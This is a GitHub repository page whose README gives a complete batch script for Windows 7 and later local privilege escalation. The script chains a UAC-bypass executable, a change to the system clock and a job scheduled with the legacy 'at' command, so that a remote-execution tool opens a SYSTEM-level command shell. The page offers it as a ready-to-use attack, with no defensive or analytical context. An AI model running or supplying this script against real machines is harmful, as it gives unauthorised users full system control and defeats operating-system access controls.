Skip to content

Windows 7+ Local Privilege Escalation AT - BypassUAC

Notifications You must be signed in to change notification settings

yanncam/LPE_AT-UAC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

LPE_AT-UAC

Windows 7+ Local Privilege Escalation AT - BypassUAC

How to open a local NT/SYSTEM prompt shell "cmd.exe" on Win7+ through the oldschool "at" method.

atuac.bat content :

@echo off
set BYPASSUACPATH=C:\bypassuac.exe
set REMOTEPATH=C:\remotex64.exe
set tmptime=%TIME%
%BYPASSUACPATH% /c time 13:37:57,44
%BYPASSUACPATH% /c at 13:38 %REMOTEPATH% /s cmd SYSCMD
ping 127.0.0.1 -n 3 > NUL
%BYPASSUACPATH% /c time %tmptime%
%REMOTEPATH% /c %COMPUTERNAME% SYSCMD

About

Windows 7+ Local Privilege Escalation AT - BypassUAC

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published